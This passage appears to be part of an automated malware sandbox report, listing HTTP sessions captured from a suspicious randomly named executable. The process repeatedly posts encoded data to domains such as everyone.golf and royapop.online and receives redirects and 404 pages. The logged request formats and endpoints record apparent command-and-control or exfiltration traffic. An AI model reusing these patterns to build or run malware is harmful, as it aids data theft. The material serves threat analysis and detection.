                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764051914 CEST1236INData Raw: 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22
                                                                                                                                                                                                                                              Data Ascii: \u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc6
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764120102 CEST212INData Raw: 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 26 26 22 75 6e
                                                                                                                                                                                                                                              Data Ascii: }();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764267921 CEST1236INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29
                                                                                                                                                                                                                                              Data Ascii: .toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764303923 CEST1236INData Raw: 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72
                                                                                                                                                                                                                                              Data Ascii: 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.coba168.info/wp-includes/css/dist/block-library/styl
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771301031 CEST1236INData Raw: 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61
                                                                                                                                                                                                                                              Data Ascii: -wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gr


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              13192.168.2.5499953.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:31.500427961 CEST743OUTPOST /kb53/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.everyone.golf
                                                                                                                                                                                                                                              Origin: http://www.everyone.golf
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.everyone.golf/kb53/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 34 5a 63 68 79 4b 78 51 68 6f 59 32 31 74 2b 51 2f 2b 39 6c 74 43 6f 70 74 32 38 73 67 33 44 52 33 41 73 6e 56 42 74 43 34 31 43 51 63 63 4f 74 2b 79 54 52 36 44 4c 71 52 76 4c 35 47 63 35 2b 35 7a 4d 53 64 78 73 35 46 77 4c 63 65 46 57 38 71 43 38 36 6d 4c 52 68 7a 7a 59 44 4f 53 54 2b 34 47 6c 31 34 39 56 68 6e 6e 56 58 6e 2f 53 38 50 41 7a 53 4d 30 54 6b 6f 51 75 47 62 67 74 68 48 62 43 44 63 6b 79 51 45 4f 2f 50 2f 41 36 59 77 66 75 32 4d 6d 78 72 79 69 53 72 54 50 33 76 53 64 4d 30 71 6d 4c 53 45 79 45 55 74 53 4e 4c 44 64 4b 53 6b 42 58 4c 47 7a 55 72 77 79 39 50 77 70 33 61 44 71 77 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=4ZchyKxQhoY21t+Q/+9ltCopt28sg3DR3AsnVBtC41CQccOt+yTR6DLqRvL5Gc5+5zMSdxs5FwLceFW8qC86mLRhzzYDOST+4Gl149VhnnVXn/S8PAzSM0TkoQuGbgthHbCDckyQEO/P/A6Ywfu2MmxryiSrTP3vSdM0qmLSEyEUtSNLDdKSkBXLGzUrwy9Pwp3aDqw=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              14192.168.2.5499963.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:34.042968035 CEST763OUTPOST /kb53/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.everyone.golf
                                                                                                                                                                                                                                              Origin: http://www.everyone.golf
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.everyone.golf/kb53/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 34 5a 63 68 79 4b 78 51 68 6f 59 32 36 74 4f 51 35 59 31 6c 34 79 70 62 6a 57 38 73 75 58 44 56 33 41 77 6e 56 42 46 53 34 6a 79 51 64 2b 57 74 76 48 6e 52 33 6a 4c 71 62 50 4c 38 49 38 35 31 35 79 77 6b 64 78 41 35 46 77 50 63 65 42 61 38 72 7a 38 31 6d 62 52 6a 6f 6a 59 42 54 43 54 2b 34 47 6c 31 34 38 78 4c 6e 6e 4e 58 6b 50 69 38 4f 6c 48 54 42 55 54 6a 76 51 75 47 4e 51 74 62 48 62 43 62 63 6c 2b 32 45 49 37 50 2f 46 47 59 77 4f 75 31 66 47 78 6c 2f 43 54 64 62 74 43 43 66 74 51 35 67 67 4f 30 46 42 34 41 68 45 67 68 5a 2f 43 36 33 68 37 7a 57 67 63 63 68 43 63 6d 71 4b 6e 71 64 39 6e 39 67 62 2f 5a 43 70 47 76 30 6d 6b 4c 6b 77 69 39 4b 6f 70 56
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=4ZchyKxQhoY26tOQ5Y1l4ypbjW8suXDV3AwnVBFS4jyQd+WtvHnR3jLqbPL8I8515ywkdxA5FwPceBa8rz81mbRjojYBTCT+4Gl148xLnnNXkPi8OlHTBUTjvQuGNQtbHbCbcl+2EI7P/FGYwOu1fGxl/CTdbtCCftQ5ggO0FB4AhEghZ/C63h7zWgcchCcmqKnqd9n9gb/ZCpGv0mkLkwi9KopV


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              15192.168.2.5499973.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:36.592191935 CEST1780OUTPOST /kb53/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.everyone.golf
                                                                                                                                                                                                                                              Origin: http://www.everyone.golf
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.everyone.golf/kb53/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 34 5a 63 68 79 4b 78 51 68 6f 59 32 36 74 4f 51 35 59 31 6c 34 79 70 62 6a 57 38 73 75 58 44 56 33 41 77 6e 56 42 46 53 34 67 53 51 63 4c 4b 74 2b 55 50 52 34 44 4c 71 58 76 4c 39 49 38 35 53 35 79 70 74 64 78 38 44 46 79 48 63 66 69 53 38 69 68 45 31 73 62 52 6a 33 7a 59 4d 4f 53 53 36 34 47 56 4c 34 39 42 4c 6e 6e 4e 58 6b 4d 36 38 59 41 7a 54 53 45 54 6b 6f 51 76 55 62 67 73 56 48 66 57 68 63 6c 71 41 45 59 62 50 2b 6c 32 59 78 38 57 31 46 47 77 44 34 43 54 56 62 74 65 42 66 74 4d 66 67 67 54 54 46 42 51 41 6a 56 45 37 49 50 61 79 67 52 2f 6e 51 48 4d 4e 30 47 77 38 69 61 36 41 5a 66 75 63 37 35 37 57 4d 50 36 35 77 56 68 35 6d 57 47 2b 48 4f 51 70 4a 78 37 4a 6b 71 72 4c 73 72 47 56 69 57 66 76 6f 39 42 54 48 38 66 56 57 51 52 73 43 65 30 41 47 38 49 63 79 6a 48 36 41 6d 77 36 6f 7a 55 48 67 50 68 75 6e 77 61 46 61 76 7a 57 73 39 51 4a 49 56 74 77 39 43 38 32 52 64 71 72 32 6d 5a 74 74 62 68 6d 6f 35 6a 5a 6e 54 76 78 52 68 71 42 39 6b 70 42 77 78 7a 6a 7a 38 79 32 44 33 37 56 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=4ZchyKxQhoY26tOQ5Y1l4ypbjW8suXDV3AwnVBFS4gSQcLKt+UPR4DLqXvL9I85S5yptdx8DFyHcfiS8ihE1sbRj3zYMOSS64GVL49BLnnNXkM68YAzTSETkoQvUbgsVHfWhclqAEYbP+l2Yx8W1FGwD4CTVbteBftMfggTTFBQAjVE7IPaygR/nQHMN0Gw8ia6AZfuc757WMP65wVh5mWG+HOQpJx7JkqrLsrGViWfvo9BTH8fVWQRsCe0AG8IcyjH6Amw6ozUHgPhunwaFavzWs9QJIVtw9C82Rdqr2mZttbhmo5jZnTvxRhqB9kpBwxzjz8y2D37V5+TJfCCO8zgi3jmzP3wEPmRiLEwIDUH/4bL2AgM94Tz3JGdcu1uuwKEjndBWKn2VwElDqvuhsTtZdkN6n0Eh6Twt7Xsf7GLOn8U/MYbHigxK3EOR8l4jtRgNxkhnNGCCxwhCCIDf/+bECWqTF0e1K1qfujQpOpcVLWF9E6ZCmoAMitVw6IqLKMIAKBJkNJ7eLLnvoPsVMFQ1wPTAHkUGAgZsnsfMnF/15/ktdkOClRBXu6wMg8m4S8rXYhXuyTaKqF89RRSNBnOJuGcqy9hC2bEltEohOT6t42NIouBwGU8WK3ZmhMeWog/0hUFIel4E+Cp2Al8uXWQrQKVqBMgOzr6JSrzOyqk8MSClcTyA8t6HxPHZdt0urllcWQbyn8BfK8lR0lXI2aQH24kXDc6sIP+ovAVgVuGmZnA1N9hFSyvIq8wPgWBWaxP+VnhObSTUGkZDe8QWBqsI277DD3YjXkqNklVLO6AiUkn3L1r52ZGk2ZrlA66buGhqPEzdemUQACEX5+Gn3BxOdJvMhNrEAgP/Yk+C+dRb2F6hErYVzjlRoNezIbZUU7RA8ga8Pp9ngSru9KuaTielLdpz2l+mG6AvsxiMqXGlCP1Pwe6WGqGzQ+Hzz5EyMvBbJWcYguywSKG/oPuvKa/ZtKgWX9jsw6zrum5evgR8iM [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              16192.168.2.5499983.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:39.130636930 CEST483OUTGET /kb53/?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.everyone.golf
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:39.753602982 CEST403INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:39 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 42 6f 68 65 3d 31 62 30 42 78 2f 39 4e 69 5a 68 62 36 4b 6d 6d 6f 4a 64 32 33 52 42 6f 72 47 35 78 6c 6c 7a 4e 30 69 38 67 64 53 74 52 75 77 2f 38 56 66 4b 59 76 32 4f 6d 39 78 2f 6a 53 39 37 43 4c 64 68 6c 7a 46 45 6d 44 56 6b 41 50 69 4c 41 5a 77 6e 42 33 52 77 69 74 36 68 59 7a 68 59 77 57 69 76 34 78 30 74 65 77 38 68 36 73 33 38 69 67 2b 65 78 41 44 6d 47 4d 30 48 38 6d 42 66 67 50 54 6b 46 59 77 3d 3d 26 76 44 3d 68 30 65 38 35 76 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=1b0Bx/9NiZhb6KmmoJd23RBorG5xllzN0i8gdStRuw/8VfKYv2Om9x/jS97CLdhlzFEmDVkAPiLAZwnB3Rwit6hYzhYwWiv4x0tew8h6s38ig+exADmGM0H8mBfgPTkFYw==&vD=h0e85v"}</script></head></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              17192.168.2.549999209.74.64.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:44.830508947 CEST746OUTPOST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6b 78 74 66 6c 74 78 45 62 56 47 33 30 74 2f 34 55 58 6f 77 6f 54 61 6c 62 56 65 79 2b 49 6f 6c 73 69 79 35 56 2b 51 58 56 59 6e 4a 78 6d 75 72 63 4b 6e 7a 58 6c 52 6d 43 78 69 41 47 45 33 4a 74 5a 37 58 78 46 45 4d 74 6e 49 31 38 5a 45 44 65 6f 65 6c 64 57 6a 41 37 69 52 46 38 6a 7a 43 35 72 63 33 43 57 6d 42 4d 75 47 53 5a 32 76 65 75 55 59 35 6a 32 4a 32 70 47 58 59 62 2b 63 4c 34 35 45 73 56 32 51 6a 77 66 34 6e 52 64 72 72 2b 31 70 77 76 49 2b 43 41 44 4a 63 6f 72 65 65 63 6b 68 6e 2b 71 58 48 67 44 37 69 55 77 62 37 75 55 42 72 79 67 47 6a 47 61 57 2f 33 70 4b 6f 4c 69 4a 6b 50 56 51 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=kxtfltxEbVG30t/4UXowoTalbVey+Iolsiy5V+QXVYnJxmurcKnzXlRmCxiAGE3JtZ7XxFEMtnI18ZEDeoeldWjA7iRF8jzC5rc3CWmBMuGSZ2veuUY5j2J2pGXYb+cL45EsV2Qjwf4nRdrr+1pwvI+CADJcoreeckhn+qXHgD7iUwb7uUBrygGjGaW/3pKoLiJkPVQ=
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:45.495470047 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:45 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              18192.168.2.550000209.74.64.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:47.372359037 CEST766OUTPOST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6b 78 74 66 6c 74 78 45 62 56 47 33 79 39 50 34 59 55 51 77 35 44 62 58 55 31 65 79 30 6f 70 69 73 69 4f 35 56 2f 55 48 56 4c 44 4a 78 44 53 72 64 4c 6e 7a 53 6c 52 6d 61 42 69 42 62 55 33 34 74 5a 33 68 78 48 51 4d 74 6e 4d 31 38 62 4d 44 65 66 4b 6b 62 47 6a 43 7a 43 52 62 34 6a 7a 43 35 72 63 33 43 57 43 76 4d 75 65 53 5a 46 33 65 76 32 67 32 75 57 4a 35 71 47 58 59 66 2b 63 48 34 35 46 37 56 79 59 5a 77 5a 30 6e 52 63 37 72 2f 68 39 33 6d 49 2b 49 4f 6a 49 53 72 6f 6a 67 47 6e 5a 4f 31 63 47 7a 2b 67 62 6c 56 47 32 52 30 32 4a 44 68 41 71 62 57 4a 65 49 6d 5a 72 42 52 42 5a 55 52 43 48 4d 49 62 49 6a 4b 6d 52 52 32 5a 44 57 43 38 54 7a 59 49 71 50
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=kxtfltxEbVG3y9P4YUQw5DbXU1ey0opisiO5V/UHVLDJxDSrdLnzSlRmaBiBbU34tZ3hxHQMtnM18bMDefKkbGjCzCRb4jzC5rc3CWCvMueSZF3ev2g2uWJ5qGXYf+cH45F7VyYZwZ0nRc7r/h93mI+IOjISrojgGnZO1cGz+gblVG2R02JDhAqbWJeImZrBRBZURCHMIbIjKmRR2ZDWC8TzYIqP
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:48.036823034 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:47 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              19192.168.2.550001209.74.64.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:49.917623997 CEST1783OUTPOST /elh0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.royapop.online
                                                                                                                                                                                                                                              Origin: http://www.royapop.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.royapop.online/elh0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
